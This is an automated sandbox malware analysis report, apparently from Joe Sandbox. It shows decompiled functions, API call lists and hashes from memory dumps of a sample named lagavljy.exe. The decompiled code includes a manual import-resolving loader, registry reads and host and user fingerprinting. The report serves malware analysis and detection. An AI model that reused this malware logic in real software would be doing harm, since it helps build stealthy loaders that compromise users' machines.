API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID:
API String ID: 2439722600-0
Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668

Uniqueness

Uniqueness Score: -1.00%

Function 004792B4, Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000400,?), ref: 004792CB
wsprintfA.USER32 ref: 00479339
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0047935E
lstrlen.KERNEL32(?,?,00000000), ref: 00479372
WriteFile.KERNEL32(00000000,?,00000000), ref: 0047937D
CloseHandle.KERNEL32(00000000), ref: 00479384

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID:
API String ID: 2439722600-0
Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction ID: cc533b9f8ed65b28a3acb81bdbfc354dacbe9056221fe05230af32d6e8b7e192
Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction Fuzzy Hash: B511B7B26401247BE7246727DD0AFEF3A6DDBC8704F00C57ABB0DE5091EEB84E458668

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD05, Relevance: 9.0, APIs: 6, Instructions: 34
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}

0x0040dd17
0x0040dd41
0x0040dd2c
0x0040dd37
0x0040dd4c
0x0040dd39
0x0040dd3b
0x00000000
0x0040dd3b
0x0040dd37
0x0040dd53
0x0040dd53
0x0040dd59
0x0040dd62
0x0040dd68
0x0040dd68
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040DD0F
GetCurrentThreadId.KERNEL32 ref: 0040DD20
GetTickCount.KERNEL32 ref: 0040DD2E
Sleep.KERNEL32(00000000,?,73B743E0,?,00000000,0040E538,?,73B743E0,?,00000000,?,0040A445), ref: 0040DD3B
InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
GetCurrentThreadId.KERNEL32 ref: 0040DD53

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
String ID:
API String ID: 3819781495-0
Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E

Uniqueness

Uniqueness Score: -1.00%

Function 0047C52C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182threadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0047C69D
InterlockedIncrement.KERNEL32(0047C734), ref: 0047C6FE
CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,0047C730), ref: 0047C711
CloseHandle.KERNEL32(00000000,?,0047C730,00413588,00478A60), ref: 0047C71C

Strings

localcfg, xrefs: 0047C52D

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
String ID: localcfg
API String ID: 1026198776-1857712256
Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction ID: 399c3c22c2e15b759de01a9072d1661c81d1a95ac5dc11ebd75ce7cfcf1d0480
Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
Instruction Fuzzy Hash: 07516BB1A00B419FC7249F6AC6C556ABBE9FB48304B50993FE18BC7A90D779F844CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004080C9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 0040815F
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408187
RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 004081BE
RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,73B743E0,00000000), ref: 00408210

Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,73B743E0,00000000), ref: 0040677E
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,73B743E0,00000000), ref: 0040679A
Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,73B743E0,00000000), ref: 004067B0
Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,73B743E0,00000000), ref: 004067BF
Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,73B743E0,00000000), ref: 004067D3
Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,73B743E0,00000000), ref: 00406807
Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040681F
Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,73B743E0,00000000), ref: 0040683E
Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,73B743E0,00000000), ref: 0040685C

Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48

Strings

C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 00408225, 0040823A

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
String ID: C:\Windows\SysWOW64\shayesoq\lagavljy.exe
API String ID: 124786226-1179203262
Opcode ID: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
Opcode Fuzzy Hash: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59

Uniqueness

Uniqueness Score: -1.00%

Function 004771AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 004771CA
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00477211
LocalFree.KERNEL32(?,?,?), ref: 0047726F
wsprintfA.USER32 ref: 00477286

Strings

|, xrefs: 00477203

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Name$AccountFreeLocalLookupUserwsprintf
String ID: |
API String ID: 2539190677-2343686810
Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction ID: 0905e0be52d358d9b12502a1fcaa3b9c2ba3593f1260a43a3f418bfbf8974e41
Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
Instruction Fuzzy Hash: 3B313C72604108BFDB01DFA5D845BDA7BACEF04354F14C066F959DB201EA78DA488B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD08, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}

APIs

gethostname.WS2_32(?,00000080), ref: 0040AD1C
lstrlenA.KERNEL32(00000000), ref: 0040AD60
lstrlenA.KERNEL32(00000000), ref: 0040AD69
lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F

Strings

LocalHost, xrefs: 0040AD79

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: lstrlen$gethostnamelstrcpy
String ID: LocalHost
API String ID: 3695455745-3154191806
Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3CA, Relevance: 7.6, APIs: 5, Instructions: 136
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x4136c4; // 0x0
						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

0x0040e3ca
0x0040e3e0
0x0040e3ee
0x0040e528
0x0040e52d
0x0040e52d
0x0040e3f4
0x0040e3f9
0x0040e3fb
0x0040e3fb
0x0040e3fe
0x0040e3fe
0x0040e400
0x0040e401
0x0040e407
0x0040e409
0x0040e40f
0x0040e413
0x0040e413
0x0040e41c
0x0040e421
0x0040e429
0x0040e42c
0x0040e42f
0x0040e43a
0x0040e452
0x0040e51d
0x0040e520
0x00000000
0x0040e458
0x0040e458
0x0040e458
0x0040e45b
0x0040e463
0x0040e469
0x0040e46e
0x0040e484
0x0040e48a
0x00000000
0x00000000
0x0040e491
0x0040e494
0x0040e499
0x0040e4a1
0x00000000
0x00000000
0x0040e4a3
0x0040e4a6
0x0040e4a9
0x0040e4ae
0x0040e4b4
0x0040e4b9
0x0040e4d3
0x00000000
0x00000000
0x0040e4d5
0x0040e4da
0x00000000
0x00000000
0x0040e4dc
0x0040e4df
0x0040e4e1
0x0040e4e6
0x00000000
0x00000000
0x00000000
0x0040e4e6
0x0040e4e8
0x0040e4ea
0x0040e4ec
0x0040e500
0x0040e50e
0x0040e516
0x0040e516
0x00000000
0x0040e4ea

APIs

RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64

Uniqueness

Uniqueness Score: -1.00%

Function 0047B461, Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0047B503
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0047B512
SystemTimeToFileTime.KERNEL32(?,?), ref: 0047B531
GetTimeZoneInformation.KERNEL32(?), ref: 0047B579
wsprintfA.USER32 ref: 0047B607

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: Time$File$Local$InformationSystemZonewsprintf
String ID:
API String ID: 4026320513-0
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: 571c159efb11e7aeb30b402f5a5bc1e8b792982ba6326b14dd0174db5d3120a9
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: 4A510DB1D0021DAACF14DFD5D8845EEBBB9EF48308F10856BE505A6150E7B94AC9CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 7.6, APIs: 5, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004762B9, Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 004762EC
LoadLibraryA.KERNEL32(?), ref: 00476313
GetProcAddress.KERNEL32(00000000,?), ref: 0047639A
IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 004763EE

Memory Dump Source

Source File: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_470000_lagavljy.jbxd

Yara matches

Similarity

API ID: HugeRead$AddressLibraryLoadProc
String ID:
API String ID: 3498078134-0
Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction ID: 0f87f92d5a50fbe914c5e3888993ac3dec5f80c02801aeead67474714309dd6b
Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
Instruction Fuzzy Hash: 0641AE71A00505ABDB10CF58C884BEAB7B6EF14354F26C56AEC09D7390D738ED45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402923, Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}

Memory Dump Source

Source File: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_400000_lagavljy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
